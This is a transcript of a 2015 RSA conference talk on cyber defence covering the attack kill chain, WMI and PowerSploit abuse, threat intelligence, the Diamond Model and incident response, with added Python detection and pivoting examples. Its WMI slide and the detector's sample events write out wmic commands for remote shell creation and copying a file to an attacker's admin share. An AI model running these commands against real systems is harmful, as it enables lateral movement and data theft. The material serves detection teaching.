The more you know the better you do
Transcript
@RSAEMEA #RSAEMEASummit
Demetrio Milea, Advanced Cyber Defence Consultant EMEA

Locard's Exchange Principle
"Wherever he steps, whatever he touches, whatever he leaves, even unconsciously, will serve as a silent witness against him. Not only his fingerprints or his footprints, but his hair, the fibers from his clothes, the glass he breaks, the tool mark he leaves, the paint he scratches, the blood he deposits."
Edmond Locard (20th century) - Criminologist
It is impossible for a criminal to act, especially considering the intensity of a crime, without leaving traces of his presence.
© Copyright 2015 EMC Corporation. All rights reserved.

Lifecycle of an attack (aka Kill Chain)
1. Intelligence Gathering
2. Initial Exploitation
3. Privilege Escalation
4. Rootkit & CnC
5. Lateral Movement
6. Data Exfiltration

The attacker's traces
Endpoint - Application - Network
https://blogs.rsa.com/eliminated-impossible/

The gap to close
Legacy enterprise security VS the exponential innovation of offensive security

Legacy security tools
Anti Virus - SIEM - IDS - IPS - Firewall

Companies, still today ...
• Application-level vulnerabilities (RCE, XSS, SQLi)
• Poor employee security training
• Single-factor authentication
• Outdated policies and procedures
• Weak application controls
• Unpatched applications and operating systems
• Unvetted suppliers and third parties

... attackers, on the other hand
• Windows Management Instrumentation: a technology built into Microsoft operating systems (>= Windows 2000) that a system administrator can use to manage local or remote workstations/servers.
• WQL is a simplified subset of SQL (Structured Query Language), with some WMI-specific extensions
• WMI commands can be run from:
  – VBScript
  – JavaScript
  – PowerShell
• wmic.exe gives access to WMI from the command line
MALICIOUS USE CASE!

(Ab)Using WMI
• Information Gathering
  – Listing installed patches, running processes (local and remote), user accounts and network shares. E.g.:
    • wmic path win32_process get Caption,Processid,Commandline
    • wmic qfe get
    • wmic nicconfig where IPEnabled='true'
    • wmic process where (Name='svchost.exe') get name,processid
    • wmic /node:remote /user:user /password:pass service get Name,Caption,State,ServiceType,pathname
• Lateral Movement
  – Remote command execution. Example: wmic /node:hostname /user:username /password:pass PROCESS CALL CREATE cmd.exe
• Data Exfiltration
  – Example: wmic /NODE:hostname /user:username /password:pass process call create xcopy d:\calc.rar \\ninjahost\c$\a.dat

Power[Shell|Sploit]
• Version 2.0 in Windows 7.0, v3 in Win7 SP1, Win2008 R2 SP1 etc.
• Object-oriented and based on the .NET Framework
• Similar to C#
PowerSploit
• A collection of PowerShell scripts (organised by category) that can be used in every phase of an attack.
  – Antivirus Bypass - Find bytes of a file which has a matching signature in antivirus.
  – Code Execution - Used to execute code on victim machine.
  – Exfiltration - Manipulate and collect information & data from victim machine(s).
  – Persistence - Maintain control to machine by adding persistence to scripts.
  – Recon - Perform reconnaissance tasks using victim machine.

Reality or perception?
Communication - Training - Visibility
You cannot control what you cannot see!
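The "(Ab)Using WMI" slide shows what remote WMI process creation and a copy to an administrative share look like from the attacker's side; the defender's counterpart is recognising those same commands in process-creation telemetry. The Python script below is an added example and is not part of the original presentation. It parses a handful of constructed process-creation records (a hypothetical key=value form standing in for the fields of Sysmon Event ID 1 or Security Event ID 4688), and flags four things: wmic.exe run with /node: together with process call create, a cleartext /password: on the command line, a copy tool writing to an admin share, and a shell spawned by the WMI provider host WmiPrvSE.exe on the target side. The credential is redacted before it is written into any finding. Host names, user names, the password and the file paths in the samples are constructed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample records in a hypothetical "key=value|key=value" form.
# Real telemetry would be Sysmon Event ID 1 or Security Event ID 4688, which
# carry the same fields. Hosts, users, password and paths are made up.
SAMPLE_EVENTS = [
    # benign local patch inventory
    "Host=ws01|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\wbem\\WMIC.exe|CommandLine=wmic qfe get",
    # remote process creation with a cleartext password (lateral movement)
    "Host=ws01|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\wbem\\WMIC.exe"
    "|CommandLine=wmic /node:srv02 /user:corp\\admin /password:Secret1 PROCESS CALL CREATE cmd.exe",
    # what the target host sees: the WMI provider host spawning a shell
    "Host=srv02|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe",
    # remote copy to an administrative share (staging / exfiltration)
    "Host=ws01|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\wbem\\WMIC.exe"
    "|CommandLine=wmic /NODE:srv02 /user:corp\\admin /password:Secret1 "
    "process call create \"xcopy d:\\calc.rar \\\\ninjahost\\c$\\a.dat\"",
    # unrelated benign service host
    "Host=srv03|ParentImage=C:\\Windows\\System32\\services.exe"
    "|Image=C:\\Windows\\System32\\svchost.exe|CommandLine=svchost.exe -k netsvcs",
]

REMOTE_NODE = re.compile(r"/node:\S+", re.I)
PROCESS_CREATE = re.compile(r"\bprocess\s+call\s+create\b", re.I)
CLEARTEXT_PASSWORD = re.compile(r"/password:\S+", re.I)
ADMIN_SHARE = re.compile(r"\\\\[^\\\s]+\\[a-z]\$", re.I)   # \\host\c$
COPY_TOOL = re.compile(r"\b(xcopy|copy|robocopy)\b", re.I)
SHELLS = ("cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe")


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    evidence: str


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed record into its fields."""
    return dict(part.split("=", 1) for part in line.split("|"))


def evaluate(event: Dict[str, str]) -> List[Finding]:
    """Apply the WMI detection rules to a single process-creation event."""
    host = event.get("Host", "?")
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    # Never store the credential itself: redact before it reaches an alert.
    evidence = CLEARTEXT_PASSWORD.sub("/password:<redacted>", cmd)
    findings: List[Finding] = []
    if image.endswith("\\wmic.exe"):
        if REMOTE_NODE.search(cmd) and PROCESS_CREATE.search(cmd):
            findings.append(Finding(host, "wmi_remote_process_create", evidence))
        if CLEARTEXT_PASSWORD.search(cmd):
            findings.append(Finding(host, "wmi_cleartext_password_on_cmdline", evidence))
        if COPY_TOOL.search(cmd) and ADMIN_SHARE.search(cmd):
            findings.append(Finding(host, "wmi_copy_to_admin_share", evidence))
    # Target-side view: Win32_Process.Create runs under WmiPrvSE.exe, so a
    # shell whose parent is the provider host is worth a look.
    if parent.endswith("\\wmiprvse.exe") and image.endswith(SHELLS):
        findings.append(Finding(host, "wmiprvse_spawned_shell", f"{parent} -> {image}"))
    return findings


def scan(lines: List[str]) -> List[Finding]:
    """Run every record through the rules and collect the findings."""
    return [f for line in lines for f in evaluate(parse_event(line))]


def count_by_rule(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.host}] {f.rule}: {f.evidence}")
    print(count_by_rule(scan(SAMPLE_EVENTS)))
```

Correlating the source-side wmic.exe finding on ws01 with the target-side WmiPrvSE.exe finding on srv02 (same time window, same target name in /node:) is what turns two weak signals into a confident lateral-movement detection; the cleartext password rule is also a reason to move administrators away from wmic.exe with inline credentials.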
Attacks are inevitable
"I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again."
- Robert Mueller (RSAC 2012), 6th Director of the FBI
Cyber Threat Intel, Incident Detection and Response

Cybercrime Response Strategy
Cyber Threat Intel: analyse and document the attackers' modus operandi
Threat Indicators & Incident Detection: detect attacks from their traces
Incident Response Strategy: mitigate the attack; profile the patterns of the attack suffered

Cyber Threat Intelligence cycle
(Diagram of the cycle. Stages: Monitor & Collect, Identify & Analyze, Communicate, Disseminate. Labels shown: Network Analysis, Commercial Collection, Dark Web, Content Management, Payload Analysis, Technical Analysis, Attribution Analysis, Report (Tactical Reporting), Strategic/Operational Reporting, Automated Processing, IOCs, IDS/IPS, Firewall, SIEM.)
https://blogs.rsa.com/intelligence-needs-operationalized/

Profiling the attack and the attacker
The Diamond Model
An analytic model both for modelling intelligence and for making it operational.
Used by:
• Incident Responder
• Threat Intel Analyst
• Risk Analyst
Axiom 1: For every intrusion event there exists an adversary taking a step towards an intended goal by using a capability over infrastructure against a victim to produce a result.
(Diamond diagram: Adversary; Infrastructure (Mail Sender IP, Domains, IPs, Destination IP); Capability (Email Headers, Attachment, Encryption); Victim.)
http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf
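The operational value of the Diamond Model comes from pivoting: take one vertex of an event (a sender IP, a domain, a mailer header, a callback URL) and find other events that share it, so that isolated events can be linked into an activity thread. The Python below is an added example, not code from the presentation or from the Diamond Model paper it cites. It represents an event as indicator sets for the four vertices, pivots on a single indicator, reports which indicators two events share, and clusters events that share infrastructure or capability indicators. The first event uses the indicators of the phishing case on the next slide (click.me, 192.158.x.x, X-Mailer: Outlook Express, update.pdf.exe, POST /callhome.php); the other two events and every victim identifier are constructed.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple

# Vertices an analyst normally pivots on; the victim vertex is usually
# excluded so that two unrelated campaigns against one mailbox are not merged.
PIVOT_VERTICES: Tuple[str, ...] = ("infrastructure", "capability")


@dataclass(frozen=True)
class DiamondEvent:
    """One intrusion event: an indicator set for each Diamond vertex."""
    event_id: str
    adversary: FrozenSet[str] = frozenset()
    infrastructure: FrozenSet[str] = frozenset()
    capability: FrozenSet[str] = frozenset()
    victim: FrozenSet[str] = frozenset()

    def vertex(self, name: str) -> FrozenSet[str]:
        return getattr(self, name)


def shared_indicators(a: DiamondEvent, b: DiamondEvent,
                      vertices: Tuple[str, ...] = PIVOT_VERTICES) -> Dict[str, FrozenSet[str]]:
    """Indicators two events have in common, keyed by vertex (empty = no link)."""
    shared: Dict[str, FrozenSet[str]] = {}
    for name in vertices:
        common = a.vertex(name) & b.vertex(name)
        if common:
            shared[name] = common
    return shared


def pivot(events: List[DiamondEvent], vertex: str, indicator: str) -> List[str]:
    """Ids of every event that carries `indicator` on the given vertex."""
    return [e.event_id for e in events if indicator in e.vertex(vertex)]


def activity_threads(events: List[DiamondEvent],
                     vertices: Tuple[str, ...] = PIVOT_VERTICES) -> List[List[str]]:
    """Group events that are linked, directly or transitively, by shared indicators."""
    parent = {e.event_id: e.event_id for e in events}   # union-find over event ids

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for i, a in enumerate(events):
        for b in events[i + 1:]:
            if shared_indicators(a, b, vertices):
                parent[find(a.event_id)] = find(b.event_id)
    threads: Dict[str, List[str]] = {}
    for e in events:
        threads.setdefault(find(e.event_id), []).append(e.event_id)
    return sorted(sorted(ids) for ids in threads.values())


# Event from the slide's phishing case; the adversary vertex stays empty
# because the slide attributes the case to no one. Victim is constructed.
PHISHING_CASE = DiamondEvent(
    event_id="E1",
    infrastructure=frozenset({"click.me", "192.158.x.x"}),
    capability=frozenset({"X-Mailer: Outlook Express", "update.pdf.exe", "POST /callhome.php"}),
    victim=frozenset({"user1@victim.example"}),
)
# Constructed: a later lure with new infrastructure but the same callback.
SECOND_WAVE = DiamondEvent(
    event_id="E2",
    infrastructure=frozenset({"docs-portal.example", "203.0.113.7"}),
    capability=frozenset({"X-Mailer: Outlook Express", "invoice.pdf.exe", "POST /callhome.php"}),
    victim=frozenset({"finance@victim.example"}),
)
# Constructed: an event with nothing in common with the other two.
UNRELATED = DiamondEvent(
    event_id="E3",
    infrastructure=frozenset({"198.51.100.9"}),
    capability=frozenset({"macro-enabled spreadsheet"}),
    victim=frozenset({"hr@victim.example"}),
)
EVENTS = [PHISHING_CASE, SECOND_WAVE, UNRELATED]

if __name__ == "__main__":
    print("pivot on 192.158.x.x:", pivot(EVENTS, "infrastructure", "192.158.x.x"))
    print("E1/E2 share:", shared_indicators(PHISHING_CASE, SECOND_WAVE))
    print("threads:", activity_threads(EVENTS))
```

The same structure is what a SIEM or threat-intel platform needs to turn the slide's phishing case into reusable content: each infrastructure and capability indicator becomes a watch-list entry, and a hit on any of them pivots straight back to the thread it belongs to.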
Profiling the attack and the attacker
The Diamond Model – A phishing case reported by the victim
Adversary: (none listed)
Infrastructure:
• click.me
• 192.158.x.x
Capability:
• X-Mailer: Outlook Express
• update.pdf.exe
• POST /callhome.php
Victim
http://www.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf

Preparing to respond to an incident
Handle future incidents better by applying the knowledge gained from past incidents.
What, When, Where, How, Who, Why:
• Automate and measure
• Educate and practise IR activities
• Form an IR team
• Classify assets, data and users
• Assess existing skills (P.P.T.)
• Identify the objectives to be reached
https://blogs.rsa.com/human-process-elements-incident-response-plan/

OODA method for an effective response
• Observe and Orient, with continuous understanding of:
  – the business
  – the attack surface
  – data, the network and application flows
• Decide & Act:
  – on the data collected in the previous phases
  – having analysed all possible options and consequences
  – C-Level
  – following policies and procedures
John Boyd (1927 – 1997, Military Strategist) - The OODA loop

Conclusions
• Content Analytics
  – Business context and risk profile per enterprise asset
• People, Processes, Technology
  – Technology to promote visibility; people and processes to identify and resolve incidents.
• Threat Intelligence
  – Prioritise and operationalise intelligence (internal, external, public and private).

EMC, RSA, the EMC logo and the RSA logo are trademarks of EMC Corporation in the U.S. and other countries.